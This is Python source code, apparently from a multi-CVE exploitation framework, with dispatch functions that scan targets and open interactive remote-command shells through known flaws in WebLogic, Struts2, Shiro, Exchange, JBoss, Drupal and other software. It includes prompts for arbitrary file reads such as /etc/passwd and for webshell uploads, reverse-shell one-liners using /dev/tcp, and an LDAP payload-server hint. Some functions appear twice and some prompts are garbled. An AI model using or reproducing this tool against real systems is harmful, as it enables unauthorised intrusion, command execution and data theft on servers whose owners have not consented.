def pt(self, target): poc_apache_activemq = ApacheActiveMQ(target) poc_apache_activemq.cve_2015_5254_poc() poc_apache_activemq.cve_2016_3088_poc() poc_apache_activemq = ApacheActiveMQ(target) poc_apache_activemq.cve_2015_5254_poc() poc_apache_activemq.cve_2016_3088_poc() poc_apache_flink = ApacheFlink(target) poc_apache_flink.cve_2020_17518_poc() poc_apache_flink.cve_2020_17519_poc() poc_apache_shiro = ApacheShiro(target) poc_apache_shiro.cve_2016_4437_poc() poc_apache_solr = ApacheSolr(target) poc_apache_solr.cve_2017_12629_poc() poc_apache_solr.cve_2019_0193_poc() poc_apache_solr.cve_2019_17558_poc() poc_apache_tomcat = ApacheTomcat(target) poc_apache_tomcat.tomcat_examples_poc() poc_apache_tomcat.cve_2017_12615_poc() poc_apache_tomcat.cve_2020_1938_poc() poc_apache_solr = Fastjson(target) poc_apache_solr.fastjson_1224_poc() poc_apache_solr.fastjson_1247_poc() poc_apache_solr.fastjson_1262_poc() poc_spring = Spring(target) poc_spring.cve_2020_5410_poc() poc_spring.cve_2019_3799_poc() poc_spring.cve_2018_1273_poc() poc_elasticsearch = Elasticsearch(target) poc_elasticsearch.cve_2015_1427_poc() poc_elasticsearch.cve_2014_3120_poc() poc_jenkins = Jenkins(target) poc_jenkins.cve_2017_1000353_poc() poc_jenkins.cve_2018_1000861_poc() poc_oracle_weblogic = OracleWeblogic(target) poc_oracle_weblogic.cve_2014_4210_poc() poc_oracle_weblogic.cve_2020_14882_poc() poc_oracle_weblogic.cve_2017_3506_poc() poc_oracle_weblogic.cve_2017_10271_poc() poc_oracle_weblogic.cve_2018_2894_poc() poc_oracle_weblogic.cve_2019_2725_poc() poc_oracle_weblogic.cve_2020_2555_poc() poc_oracle_weblogic.cve_2019_2729_poc() poc_oracle_weblogic.cve_2020_2883_poc() poc_oracle_weblogic.cve_2020_2551_poc() poc_nexus = Nexus(target) poc_nexus.cve_2019_7238_poc() poc_nexus.cve_2020_10199_poc() poc_redhat_jboss = RedHatJBoss(target) poc_redhat_jboss.cve_2010_0738_poc() poc_redhat_jboss.cve_2010_1428_poc() poc_redhat_jboss.cve_2015_7501_poc() poc_redhat_jboss.cve_2017_12149_poc() poc_apache_unomi = ApacheUnomi(target) poc_apache_unomi.cve_2020_13942_poc() poc_thinkphp = ThinkPHP(target) poc_thinkphp.cve_2019_9082_poc() poc_thinkphp.cve_2018_20062_poc() poc_drupal = Drupal(target) poc_drupal.cve_2018_7600_poc() poc_drupal.cve_2018_7602_poc() poc_drupal.cve_2019_6340_poc() poc_apache_struts2 = ApacheStruts2(target) poc_apache_struts2.s2_005_poc() poc_apache_struts2.s2_008_poc() poc_apache_struts2.s2_009_poc() poc_apache_struts2.s2_013_poc() poc_apache_struts2.s2_015_poc() poc_apache_struts2.s2_016_poc() poc_apache_struts2.s2_029_poc() poc_apache_struts2.s2_032_poc() poc_apache_struts2.s2_045_poc() poc_apache_struts2.s2_046_poc() poc_apache_struts2.s2_048_poc() poc_apache_struts2.s2_052_poc() poc_apache_struts2.s2_057_poc() poc_apache_struts2.s2_059_poc() poc_apache_struts2.s2_061_poc() poc_apache_struts2.s2_devMode_poc() poc_apache_druid = ApacheDruid(target) poc_apache_druid.cve_2021_25646_poc() poc_laravel = Laravel(target) poc_laravel.cve_2021_3129_poc() poc_vmware = Vmware(target) poc_vmware.time_2020_1013_poc() poc_vmware.cve_2021_21972_poc() poc_saltstack = SaltStack(target) poc_saltstack.cve_2021_25282_poc() poc_nodejs = NodeJs(target) poc_nodejs.cve_2021_21315_poc() poc_exchange = Exchange(target) poc_exchange.cve_2021_26855_poc() poc_exchange.cve_2021_27065_poc()
def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) exp_apache_druid = ApacheDruid(target) exp_laravel = Laravel(target) exp_vmware = Vmware(target) exp_saltstack = SaltStack(target) exp_exchange = Exchange(target) exp_big_ip = BIG_IP(target) exp_apache_ofbiz = ApacheOFBiz(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") bash_2 = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"" ) cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 path = "/tmp/test" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示,没啥用 laravel_key = "null" # 为了消除pycharm错误提示,没啥用 laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + color.red( " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) shiro_gadget = input( now.timed(de=delay) + color.green("[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133": if os_check() == "linux" or os_check() == "other": laravel_key = input( now.timed(de=delay) + color.green("[+] Input APP_KEY: ")) elif os_check() == "windows": laravel_key = input( now.no_color_timed(de=delay) + "[+] Input APP_KEY: ") if os_check() == "linux" or os_check() == "other": laravel_gadget = input( now.timed(de=delay) + color.green( "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")) elif os_check() == "windows": laravel_gadget = input( now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget) elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972": if os_check() == "linux" or os_check() == "other": os_type = input( now.timed(de=delay) + color.green("[+] The target os type (linux/windows): ")) elif os_check() == "windows": os_type = input( now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_vmware.cve_2021_21972_exp(cmd, os_type) elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282": if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] upload file: ")) path = input( now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] upload file: ") path = input( now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_saltstack.cve_2021_25282_exp(cmd, file, path) elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065": if os_check() == "linux" or os_check() == "other": email = input(now.timed(de=delay) + color.green("[+] email: ")) file = input( now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): ")) elif os_check() == "windows": email = input(now.timed(de=delay) + color.green("[+] email: ")) file = input( now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_exchange.cve_2021_27065_exp(cmd, file, email) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "1.2.24": print(rmi_ldap) exp_fastjson.fastjson_1224_exp(cmd) elif vul_num == "1.2.47": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "1.2.62": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) elif vul_num == "CVE-2021-25646": print(bash_2) exp_apache_druid.cve_2021_25646_exp(cmd) elif vul_num == "CVE-2021-22986": exp_big_ip.cve_2021_22986_exp(cmd) elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) exp_big_ip.cve_2020_5902_exp(cmd) elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295": print( now.timed(de=delay) + color.yel_info() + color.yellow( " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html" )) exp_apache_ofbiz.cve_2021_26295_exp(cmd) else: pass
def apache_tomcat(self, target, gevent_pool): poc_apache_tomcat = ApacheTomcat(target) gevent_pool.append(spawn(poc_apache_tomcat.tomcat_examples_poc)) gevent_pool.append(spawn(poc_apache_tomcat.cve_2017_12615_poc)) gevent_pool.append(spawn(poc_apache_tomcat.cve_2020_1938_poc))
def exploit(target, vul_num): target = url_check(target) if survival_check(target) == "f": print( now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) exit(0) delay = globals.get_value("DELAY") # 获取全局变量DELAY exp_apache_shiro = ApacheShiro(target) exp_apache_solr = ApacheSolr(target) exp_apache_tomcat = ApacheTomcat(target) exp_elasticsearch = Elasticsearch(target) exp_apache_flink = ApacheFlink(target) exp_jenkins = Jenkins(target) exp_spring = Spring(target) exp_nexus = Nexus(target) exp_oracle_weblogic = OracleWeblogic(target) exp_redhat_jboss = RedHatJBoss(target) exp_apache_unomi = ApacheUnomi(target) exp_thinkphp = ThinkPHP(target) exp_drupal = Drupal(target) exp_fastjson = Fastjson(target) exp_apache_struts2 = ApacheStruts2(target) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) print( now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) nc = now.timed(de=0) + color.yel_info() + color.yellow( " input \"nc\" bounce linux shell") up = now.timed(de=0) + color.yel_info() + color.yellow( " input \"upload\" upload webshell") rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow( " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") bash = now.timed(de=0) + color.yel_info() + color.yellow( " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") cmd = "whoami" # 为了消除pycharm错误提示,没啥用 file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 shiro_key = "1" # 为了消除pycharm错误提示,没啥用 shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 nexus_p = "admin" # 为了消除pycharm错误提示 if vul_num not in explists: print( now.timed(de=0) + color.red_warn() + color.red( " The vulnerability does not support exploitation. Please refer to \"--list\"" )) sys.exit(0) elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": if os_check() == "linux" or os_check() == "other": shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) shiro_gadget = input( now.timed(de=delay) + color.green("[+] gadget: ")) elif os_check() == "windows": shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_tomcat.cve_2020_1938_exp(file) elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2019_3799_exp(file) elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_spring.cve_2020_5410_exp(file) elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": print( now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) while True: if os_check() == "linux" or os_check() == "other": file = input( now.timed(de=delay) + color.green("[+] File >>> ")) elif os_check() == "windows": file = input(now.no_color_timed(de=delay) + "[+] File >>> ") if file == "exit" or file == "quit" or file == "bye": exit(0) exp_apache_flink.cve_2020_17519_exp(file) elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": if os_check() == "linux" or os_check() == "other": nexus_u = input( now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows": nexus_u = input( now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": sys.exit(0) exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) # 远程命令执行漏洞单独简单运行 else: while True: if os_check() == "linux" or os_check() == "other": cmd = input( now.timed(de=delay) + color.green("[+] Shell >>> ")) elif os_check() == "windows": cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") if cmd == "exit" or cmd == "quit" or cmd == "bye": exit(0) elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": exp_apache_tomcat.cve_2017_12615_exp(cmd) elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": exp_elasticsearch.cve_2014_3120_exp(cmd) elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": exp_elasticsearch.cve_2015_1427_exp(cmd) elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": exp_jenkins.cve_2018_1000861_exp(cmd) elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": exp_oracle_weblogic.cve_2017_3506_exp(cmd) elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": print(nc) print(up) exp_oracle_weblogic.cve_2017_10271_exp(cmd) elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": exp_oracle_weblogic.cve_2018_2894_exp(cmd) elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": print(nc) print(up) exp_oracle_weblogic.cve_2019_2725_exp(cmd) elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": print(nc) exp_oracle_weblogic.cve_2019_2729_exp(cmd) elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": exp_oracle_weblogic.cve_2020_2555_exp(cmd) elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": exp_oracle_weblogic.cve_2020_2883_exp(cmd) elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": exp_oracle_weblogic.cve_2020_14882_exp(cmd) elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": exp_apache_solr.cve_2017_12629_exp(cmd) elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": exp_apache_solr.cve_2019_17558_exp(cmd) elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": exp_nexus.cve_2019_7238_exp(cmd) elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": exp_redhat_jboss.cve_2010_0738_exp(cmd) elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": exp_redhat_jboss.cve_2010_1428_exp(cmd) elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": exp_redhat_jboss.cve_2015_7501_exp(cmd) elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": exp_apache_unomi.cve_2020_13942_exp(cmd) elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": print(up) exp_thinkphp.cve_2019_9082_exp(cmd) elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": exp_thinkphp.cve_2018_20062_exp(cmd) elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": exp_drupal.cve_2018_7600_exp(cmd) elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": exp_drupal.cve_2018_7602_exp(cmd) elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": exp_drupal.cve_2019_6340_exp(cmd) elif vul_num == "S2-005" or vul_num == "s2-005": exp_apache_struts2.s2_005_exp(cmd) elif vul_num == "S2-008" or vul_num == "s2-008": exp_apache_struts2.s2_008_exp(cmd) elif vul_num == "S2-009" or vul_num == "s2-009": exp_apache_struts2.s2_009_exp(cmd) elif vul_num == "S2-013" or vul_num == "s2-013": exp_apache_struts2.s2_013_exp(cmd) elif vul_num == "S2-015" or vul_num == "s2-015": exp_apache_struts2.s2_015_exp(cmd) elif vul_num == "S2-016" or vul_num == "s2-016": exp_apache_struts2.s2_016_exp(cmd) elif vul_num == "S2-029" or vul_num == "s2-029": exp_apache_struts2.s2_029_exp(cmd) elif vul_num == "S2-032" or vul_num == "s2-032": exp_apache_struts2.s2_032_exp(cmd) elif vul_num == "S2-045" or vul_num == "s2-045": exp_apache_struts2.s2_045_exp(cmd) elif vul_num == "S2-046" or vul_num == "s2-046": exp_apache_struts2.s2_046_exp(cmd) elif vul_num == "S2-048" or vul_num == "s2-048": exp_apache_struts2.s2_048_exp(cmd) elif vul_num == "S2-052" or vul_num == "s2-052": exp_apache_struts2.s2_052_exp(cmd) elif vul_num == "S2-057" or vul_num == "s2-057": exp_apache_struts2.s2_057_exp(cmd) elif vul_num == "S2-059" or vul_num == "s2-059": exp_apache_struts2.s2_059_exp(cmd) elif vul_num == "S2-061" or vul_num == "s2-061": exp_apache_struts2.s2_061_exp(cmd) elif vul_num == "S2-devMode" or vul_num == "s2-devmode": exp_apache_struts2.s2_devMode_exp(cmd) elif vul_num == "1.2.24": print(rmi_ldap) exp_fastjson.fastjson_1224_exp(cmd) elif vul_num == "1.2.47": print(rmi_ldap) exp_fastjson.fastjson_1247_exp(cmd) elif vul_num == "1.2.62": print(rmi_ldap) exp_fastjson.fastjson_1262_exp(cmd) else: pass